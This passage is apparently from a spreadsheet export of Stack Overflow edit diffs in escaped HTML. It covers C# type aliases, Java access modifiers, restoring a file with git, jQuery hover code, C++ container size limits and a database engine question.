 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-built_in"&gt;object&lt;/span&gt;:  System.Object_x000D_
&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;:  System.String_x000D_
&lt;span class="hljs-built_in"&gt;bool&lt;/span&gt;:    System.Boolean_x000D_
&lt;span class="hljs-built_in"&gt;byte&lt;/span&gt;:    System.Byte_x000D_
&lt;span class="hljs-built_in"&gt;sbyte&lt;/span&gt;:   System.SByte_x000D_
&lt;span class="hljs-built_in"&gt;short&lt;/span&gt;:   System.Int16_x000D_
&lt;span class="hljs-built_in"&gt;ushort&lt;/span&gt;:  System.UInt16_x000D_
&lt;span class="hljs-built_in"&gt;int&lt;/span&gt;:     System.Int32_x000D_
&lt;span class="hljs-built_in"&gt;uint&lt;/span&gt;:    System.UInt32_x000D_
&lt;span class="hljs-built_in"&gt;long&lt;/span&gt;:    System.Int64_x000D_
&lt;span class="hljs-built_in"&gt;ulong&lt;/span&gt;:   System.UInt64_x000D_
&lt;span class="hljs-built_in"&gt;float&lt;/span&gt;:   System.Single_x000D_
&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;:  System.Double_x000D_
&lt;span class="hljs-built_in"&gt;decimal&lt;/span&gt;: System.Decimal_x000D_
&lt;span class="hljs-built_in"&gt;char&lt;/span&gt;:    System.Char_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Apart from &lt;code&gt;string&lt;/code&gt;, &lt;code&gt;object&lt;/code&gt;, the aliases are all to value types. &lt;code&gt;decimal&lt;/code&gt; is a value type, but not a primitive type in the CLR. The only primitive type which doesn't have an alias is &lt;code&gt;System.IntPtr&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; In the spec, the value type aliases are known as "simple types". Literals can be used for constant values of every simple type; no other value types have literal forms available. (Compare this with VB, which allows &lt;code&gt;DateTime&lt;/code&gt; literals, and has an alias for it too.)&lt;/p&gt; _x000D_
 &lt;p&gt; There is one circumstance in which you &lt;em&gt;have&lt;/em&gt; to use the aliases: when explicitly specifying an enum's underlying type. For instance:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-built_in"&gt;enum&lt;/span&gt; Foo : UInt32 {} &lt;span class="hljs-comment"&gt;// Invalid&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-built_in"&gt;enum&lt;/span&gt; Bar : &lt;span class="hljs-built_in"&gt;uint&lt;/span&gt;   {} &lt;span class="hljs-comment"&gt;// Valid&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Finally, when it comes to which to use: personally I use the aliases everywhere for the implementation, but the CLR type for any APIs. It really doesn't matter too much which you use in terms of implementation - consistency among your team is nice, but no-one else is going to care. On the other hand, it's genuinely important that if you refer to a type in an API, you do so in a language neutral way. A method called &lt;code&gt;&lt;span class="diff-delete"&gt;"ReadInt32" is unambiguous&lt;/span&gt;&lt;/code&gt;, whereas a method called &lt;span class="diff-delete"&gt;"&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;ReadInt&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;"&lt;/span&gt; requires interpretation. The caller could be using a language which defines an "int" alias for Int16, for example. The .NET framework designers have followed this pattern, good examples being in the BitConverter, BinaryReader and Convert classes.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Just for the sake of completeness, here's a brain dump of related information&lt;span class="diff-add"&gt;..&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; As others have noted, &lt;code&gt;string&lt;/code&gt; is an alias for &lt;code&gt;System.String&lt;/code&gt;. They compile to the same code, so at execution time there is no difference whatsoever. This is just one of the aliases in C#. The complete list is:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-built_in"&gt;object&lt;/span&gt;:  System.Object_x000D_
&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;:  System.String_x000D_
&lt;span class="hljs-built_in"&gt;bool&lt;/span&gt;:    System.Boolean_x000D_
&lt;span class="hljs-built_in"&gt;byte&lt;/span&gt;:    System.Byte_x000D_
&lt;span class="hljs-built_in"&gt;sbyte&lt;/span&gt;:   System.SByte_x000D_
&lt;span class="hljs-built_in"&gt;short&lt;/span&gt;:   System.Int16_x000D_
&lt;span class="hljs-built_in"&gt;ushort&lt;/span&gt;:  System.UInt16_x000D_
&lt;span class="hljs-built_in"&gt;int&lt;/span&gt;:     System.Int32_x000D_
&lt;span class="hljs-built_in"&gt;uint&lt;/span&gt;:    System.UInt32_x000D_
&lt;span class="hljs-built_in"&gt;long&lt;/span&gt;:    System.Int64_x000D_
&lt;span class="hljs-built_in"&gt;ulong&lt;/span&gt;:   System.UInt64_x000D_
&lt;span class="hljs-built_in"&gt;float&lt;/span&gt;:   System.Single_x000D_
&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;:  System.Double_x000D_
&lt;span class="hljs-built_in"&gt;decimal&lt;/span&gt;: System.Decimal_x000D_
&lt;span class="hljs-built_in"&gt;char&lt;/span&gt;:    System.Char_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Apart from &lt;code&gt;string&lt;/code&gt;, &lt;code&gt;object&lt;/code&gt;, the aliases are all to value types. &lt;code&gt;decimal&lt;/code&gt; is a value type, but not a primitive type in the CLR. The only primitive type which doesn't have an alias is &lt;code&gt;System.IntPtr&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; In the spec, the value type aliases are known as "simple types". Literals can be used for constant values of every simple type; no other value types have literal forms available. (Compare this with VB, which allows &lt;code&gt;DateTime&lt;/code&gt; literals, and has an alias for it too.)&lt;/p&gt; _x000D_
 &lt;p&gt; There is one circumstance in which you &lt;em&gt;have&lt;/em&gt; to use the aliases: when explicitly specifying an enum's underlying type. For instance:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-built_in"&gt;enum&lt;/span&gt; Foo : UInt32 {} &lt;span class="hljs-comment"&gt;// Invalid&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-built_in"&gt;enum&lt;/span&gt; Bar : &lt;span class="hljs-built_in"&gt;uint&lt;/span&gt;   {} &lt;span class="hljs-comment"&gt;// Valid&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Finally, when it comes to which to use: personally I use the aliases everywhere for the implementation, but the CLR type for any APIs. It really doesn't matter too much which you use in terms of implementation - consistency among your team is nice, but no-one else is going to care. On the other hand, it's genuinely important that if you refer to a type in an API, you do so in a language neutral way. A method called &lt;span class="diff-add"&gt;"ReadInt32" is unambiguous&lt;/span&gt;, whereas a method called &lt;span class="diff-add"&gt;"ReadInt"&lt;/span&gt; requires interpretation. The caller could be using a language which defines an "int" alias for Int16, for example. The .NET framework designers have followed this pattern, good examples being in the BitConverter, BinaryReader and Convert classes.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Chintan Khetiya</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Designs like MVP and MVC typically try to abstract as much logic out of the actual GUI as possible. One very popular article about this is &lt;a href="http://web.archive.org/web/20110721175855/http://www.objectmentor.com/resources/articles/TheHumbleDialogBox.pdf" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;"The Humble Dialog Box"&lt;/span&gt;&lt;/a&gt; by Michael Feathers. Personally I've had mixed experiences with trying to move logic out of the UI - sometimes it's worked very well, and at other times it's been more trouble than it's worth. It's somewhat outside my area of expertise though.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Designs like MVP and MVC typically try to abstract as much logic out of the actual GUI as possible. One very popular article about this is &lt;a href="http://www.objectmentor.com/resources/articles/TheHumbleDialogBox.pdf" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;"The Humble Dialog Box"&lt;/span&gt;&lt;/a&gt; by Michael Feathers. Personally I've had mixed experiences with trying to move logic out of the UI - sometimes it's worked very well, and at other times it's been more trouble than it's worth. It's somewhat outside my area of expertise though.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Bart</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This Java &lt;a href="http://java.sun.com/docs/books/tutorial/java/javaOO/accesscontrol.html" rel="nofollow noreferrer"&gt;tutorial&lt;/a&gt; may be of some use to you.&lt;/p&gt; _x000D_
 &lt;pre&gt;Modifier    | Class | Package | Subclass | World_x000D_
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”_x000D_
public      |  âœ”    |    âœ”    |    âœ”     |   âœ”_x000D_
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”_x000D_
protected   |  âœ”    |    âœ”    |    âœ” &lt;span class="diff-delete"&gt;**&lt;/span&gt;  |   âœ˜_x000D_
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”_x000D_
no modifier |  âœ”    |    âœ”    |    âœ˜     |   âœ˜_x000D_
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”_x000D_
private     |  âœ”    |    âœ˜    |    âœ˜     |   âœ˜&lt;span class="diff-delete"&gt;_x000D_
_x000D_
** only through inheritance&lt;/span&gt;_x000D_
&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This Java &lt;a href="http://java.sun.com/docs/books/tutorial/java/javaOO/accesscontrol.html" rel="nofollow noreferrer"&gt;tutorial&lt;/a&gt; may be of some use to you.&lt;/p&gt; _x000D_
 &lt;pre&gt;Modifier    | Class | Package | Subclass | World_x000D_
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”_x000D_
public      |  âœ”    |    âœ”    |    âœ”     |   âœ”_x000D_
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”_x000D_
protected   |  âœ”    |    âœ”    |    âœ” &lt;span class="diff-add"&gt;  &lt;/span&gt;  |   âœ˜_x000D_
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”_x000D_
no modifier |  âœ”    |    âœ”    |    âœ˜     |   âœ˜_x000D_
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”+â€”â€”â€”â€”â€”â€”â€”_x000D_
private     |  âœ”    |    âœ˜    |    âœ˜     |   âœ˜_x000D_
&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>mata</t>
  </si>
  <si>
    <t>user2067316</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have made some changes to a file which has been committed a few times as part of a group of files, but now want to reset/revert the changes on it back to a previous version.&lt;/p&gt; _x000D_
 &lt;p&gt; I have done a &lt;code&gt;git log&lt;/code&gt; along with a &lt;code&gt;git diff&lt;/code&gt; to find the revision I need, but just have no idea how to get the file back to its former state in the past.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have made some changes to a file which has been committed a few times as part of a group of files, but now want to reset/revert the changes on it back to a previous version.&lt;/p&gt; _x000D_
 &lt;p&gt; I have done a &lt;code&gt;git log&lt;/code&gt; along with a &lt;code&gt;git diff&lt;/code&gt; to find the revision I need, but just have no idea how to get the file back to its former state in the past.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Any help is greatly appreciated.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Hates_</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Assuming the commit you want is &lt;code&gt;abcde&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git checkout abcde file/to/restore_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The &lt;a href="http://schacon.github.com/git/git-checkout.html" rel="nofollow noreferrer"&gt;git checkout&lt;/a&gt; man page gives more information.&lt;/p&gt; _x000D_
 &lt;p&gt; As a side note, I've always been uncomfortable with this command because it's used for both ordinary things (changing between branches) and unusual destructive things (discarding changes in the working directory).&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;sup&gt;&lt;span class="diff-delete"&gt;(Edited to add valuable comment):&lt;/span&gt;&lt;/sup&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; If you messed up in "abbcdf" and want the version &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;right before&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; "abbcdf", you can do &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;git checkout "abbcdf~1" path/to/file&lt;/span&gt;&lt;/code&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Assuming the commit you want is &lt;code&gt;abcde&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;git checkout abcde file/to/restore_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The &lt;a href="http://schacon.github.com/git/git-checkout.html" rel="nofollow noreferrer"&gt;git checkout&lt;/a&gt; man page gives more information.&lt;/p&gt; _x000D_
 &lt;p&gt; As a side note, I've always been uncomfortable with this command because it's used for both ordinary things (changing between branches) and unusual destructive things (discarding changes in the working directory).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mike G</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The display looks interesting, because a binary file can contain non-printable characters. It is up to the displaying program to replace such characters with something else.&lt;/p&gt; _x000D_
 &lt;p&gt; This can be prevented by using a hex&lt;span class="diff-delete"&gt;-editor&lt;/span&gt;. Such a program displays each byte from the file as its hexadecimal value. That makes for a nice tabular view of the file, but it is not easy for the average person to decipher this view, because we are not used to look at data that way.&lt;/p&gt; _x000D_
 &lt;p&gt; There are a few ways to find out what program a file might belong to. You can look at the beginning of the file and with some knowledge, you might recognize the file type. There are some types that begin with the same characters (RAR, GIF etc.). For other types it might not be as easy.&lt;/p&gt; _x000D_
 &lt;p&gt; In Linux you can use the "file" command to help you determine file type. There are probably programs for Windows that will do the same.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The display looks interesting, because a binary file can contain non-printable characters. It is up to the displaying program to replace such characters with something else.&lt;/p&gt; _x000D_
 &lt;p&gt; This can be prevented by using a hex&lt;span class="diff-add"&gt; editor&lt;/span&gt;. Such a program displays each byte from the file as its hexadecimal value. That makes for a nice tabular view of the file, but it is not easy for the average person to decipher this view, because we are not used to look at data that way.&lt;/p&gt; _x000D_
 &lt;p&gt; There are a few ways to find out what program a file might belong to. You can look at the beginning of the file and with some knowledge, you might recognize the file type. There are some types that begin with the same characters (RAR, GIF etc.). For other types it might not be as easy.&lt;/p&gt; _x000D_
 &lt;p&gt; In Linux you can use the "file" command to help you determine file type. There are probably programs for Windows that will do the same.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>HS.</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would recommend a look at jQuery for your task. It is quite easy to learn and produces nice effects quickly. But&lt;span class="diff-delete"&gt; for&lt;/span&gt; your described effect alone, pure JavaScript would also be enough.&lt;/p&gt; _x000D_
 &lt;p&gt; Make your DIVs always have a class called "selectable". You can toggle other CSS classes later on. Create a CSS class named "selected" and give it the desired look.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;div class="selectable"&amp;gt;  (=off) vs. &amp;lt;div class="selectable selected"&amp;gt; (=on)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then add something like this to the scripts section of your document:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$(document).ready(function(){_x000D_
_x000D_
  // handle mouseover and mouseout of the parent div_x000D_
  $("div.selectable").mouseover(function(){_x000D_
    $(this).addClass("selected").addClass("mouseIsOver");_x000D_
  });_x000D_
  $("div.selectable").mouseout(function(){_x000D_
      $(this).removeClass("selected").removeClass("mouseIsOver");_x000D_
  });_x000D_
_x000D_
  // handle focus and blur of the contained input elememt,_x000D_
  // unless it has already been selected by mouse move_x000D_
  $("div.selectable input").focus(function(){_x000D_
    $(this).parents("div.selectable").not(".mouseIsOver").addClass("selected");_x000D_
  });_x000D_
  $("div.selectable input").blur(function(){_x000D_
      $(this).parents("div.selectable").not(".mouseIsOver").removeClass("selected");_x000D_
  });_x000D_
});_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is untested so there might be a glitch in it, but it will give you the general idea where to start.&lt;/p&gt; _x000D_
 &lt;p&gt; P.S: Changing text size on mouse move may not be the best of all ideas. It leads to rearranging the page layout which is annoying for the user.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would recommend a look at jQuery for your task. It is quite easy to learn and produces nice effects quickly. But your described effect alone, pure JavaScript would also be enough.&lt;/p&gt; _x000D_
 &lt;p&gt; Make your DIVs always have a class called "selectable". You can toggle other CSS classes later on. Create a CSS class named "selected" and give it the desired look.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;div class="selectable"&amp;gt;  (=off) vs. &amp;lt;div class="selectable selected"&amp;gt; (=on)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Then add something like this to the scripts section of your document:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$(document).ready(function(){_x000D_
_x000D_
  // handle mouseover and mouseout of the parent div_x000D_
  $("div.selectable").mouseover(function(){_x000D_
    $(this).addClass("selected").addClass("mouseIsOver");_x000D_
  });_x000D_
  $("div.selectable").mouseout(function(){_x000D_
      $(this).removeClass("selected").removeClass("mouseIsOver");_x000D_
  });_x000D_
_x000D_
  // handle focus and blur of the contained input elememt,_x000D_
  // unless it has already been selected by mouse move_x000D_
  $("div.selectable input").focus(function(){_x000D_
    $(this).parents("div.selectable").not(".mouseIsOver").addClass("selected");_x000D_
  });_x000D_
  $("div.selectable input").blur(function(){_x000D_
      $(this).parents("div.selectable").not(".mouseIsOver").removeClass("selected");_x000D_
  });_x000D_
});_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is untested so there might be a glitch in it, but it will give you the general idea where to start.&lt;/p&gt; _x000D_
 &lt;p&gt; P.S: Changing text size on mouse move may not be the best of all ideas. It leads to rearranging the page layout which is annoying for the user.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>John Topley</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There are two limits, both not enforced by C++ but rather by the hardware.&lt;/p&gt; _x000D_
 &lt;p&gt; The first limit (should never be reached) is set by the restrictions of the size type used to describe an index in the array (and the size thereof). It is given by the maximum value the system's &lt;code&gt;std::size_t&lt;/code&gt; can take. This data type should always be the largest integer type of a system.&lt;/p&gt; _x000D_
 &lt;p&gt; The other limit is a physical memory limit. The larger your objects in the array are, the sooner this limit is reached because memory is full. For example, a &lt;code&gt;vector&amp;lt;int&amp;gt;&lt;/code&gt; of a given size &lt;em&gt;n&lt;/em&gt; typically takes about four times as much memory as an array of type &lt;code&gt;vector&amp;lt;char&amp;gt;&lt;/code&gt; (minus a small constant value). Therefore, a &lt;code&gt;vector&amp;lt;char&amp;gt;&lt;/code&gt; may contain more items than a &lt;code&gt;vector&amp;lt;int&amp;gt;&lt;/code&gt; before memory is full. The same counts for the native C-style arrays &lt;code&gt;int[]&lt;/code&gt; and &lt;code&gt;char[]&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Additionally, this upper limit may be influenced by the type of &lt;code&gt;allocator&lt;/code&gt; used to construct the &lt;code&gt;vector&lt;/code&gt; because an &lt;code&gt;allocator&lt;/code&gt; is free to manage memory any way it wants. A very odd but nontheless conceivable allocator could pool memory in such a way that identical instances of an object share resources. This way, you could insert a lot of identical objects into a container that would otherwise use up all the available memory.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Also this can hit the program &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;stack&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; size limits, but you can change this limit later, so it is a good practice if you have big data to use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;dynamic allocation&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; (on the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;heap&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Apart from that, C++ doesn't enforce any limits.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There are two limits, both not enforced by C++ but rather by the hardware.&lt;/p&gt; _x000D_
 &lt;p&gt; The first limit (should never be reached) is set by the restrictions of the size type used to describe an index in the array (and the size thereof). It is given by the maximum value the system's &lt;code&gt;std::size_t&lt;/code&gt; can take. This data type should always be the largest integer type of a system.&lt;/p&gt; _x000D_
 &lt;p&gt; The other limit is a physical memory limit. The larger your objects in the array are, the sooner this limit is reached because memory is full. For example, a &lt;code&gt;vector&amp;lt;int&amp;gt;&lt;/code&gt; of a given size &lt;em&gt;n&lt;/em&gt; typically takes about four times as much memory as an array of type &lt;code&gt;vector&amp;lt;char&amp;gt;&lt;/code&gt; (minus a small constant value). Therefore, a &lt;code&gt;vector&amp;lt;char&amp;gt;&lt;/code&gt; may contain more items than a &lt;code&gt;vector&amp;lt;int&amp;gt;&lt;/code&gt; before memory is full. The same counts for the native C-style arrays &lt;code&gt;int[]&lt;/code&gt; and &lt;code&gt;char[]&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Additionally, this upper limit may be influenced by the type of &lt;code&gt;allocator&lt;/code&gt; used to construct the &lt;code&gt;vector&lt;/code&gt; because an &lt;code&gt;allocator&lt;/code&gt; is free to manage memory any way it wants. A very odd but nontheless conceivable allocator could pool memory in such a way that identical instances of an object share resources. This way, you could insert a lot of identical objects into a container that would otherwise use up all the available memory.&lt;/p&gt; _x000D_
 &lt;p&gt; Apart from that, C++ doesn't enforce any limits.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ahmed Hamdy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm having to start building the architecture for a database project but i really don't know the differences between the engines.&lt;/p&gt; _x000D_
 &lt;p&gt; Anyone can explain whats the pros and bads of each of these three engines? We'll have to choose one of them and the only thing I actualy know about them is this:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Mysql &amp;amp; Postgres:&lt;/li&gt; _x000D_
  &lt;li&gt; Are free but not so good as oracle&lt;/li&gt; _x000D_
  &lt;li&gt; Mysql as security problems (is this true?)&lt;/li&gt; _x000D_
  &lt;li&gt; Oracle:&lt;/li&gt; _x000D_
  &lt;li&gt; Best data base engine in the world&lt;/li&gt; _x000D_
  &lt;li&gt; Expensive&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Can someone clear out other differences between them? This is a medium/large (we're thinking of around some 100 to 200 tables) project with low budget, what would you choose? And with a higher budget?&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Thanks all for helping clarify the differences&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;ps: hope i'm not duplicating an already existing post, i've tried to search but didn't find any&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm having to start building the architecture for a database project but i really don't know the differences between the engines.&lt;/p&gt; _x000D_
 &lt;p&gt; Anyone can explain whats the pros and bads of each of these three engines? We'll have to choose one of them and the only thing I actualy know about them is this:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Mysql &amp;amp; Postgres:&lt;/li&gt; _x000D_
  &lt;li&gt; Are free but not so good as oracle&lt;/li&gt; _x000D_
  &lt;li&gt; Mysql as security problems (is this true?)&lt;/li&gt; _x000D_
  &lt;li&gt; Oracle:&lt;/li&gt; _x000D_
  &lt;li&gt; Best data base engine in the world&lt;/li&gt; _x000D_
  &lt;li&gt; Expensive&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Can someone clear out other differences between them? This is a medium/large (we're thinking of around some 100 to 200 tables) project with low budget, what would you choose? And with a higher budget?&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;ps: I hope I'm not duplicating an existing post, but I've tried to search and I didn't find any&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Paul Dixon</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Which types of objects fall into the domain of &lt;span class="diff-delete"&gt;"scriptable"&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Which types of objects fall into the domain of &lt;span class="diff-add"&gt;"subscriptable"&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include &amp;lt;algorithm&amp;gt; _x000D_
#include &amp;lt;cctype&amp;gt;_x000D_
#include &amp;lt;locale&amp;gt;_x000D_
_x000D_
// trim from start (in place)_x000D_
static inline void ltrim(std::string &amp;amp;s) {_x000D_
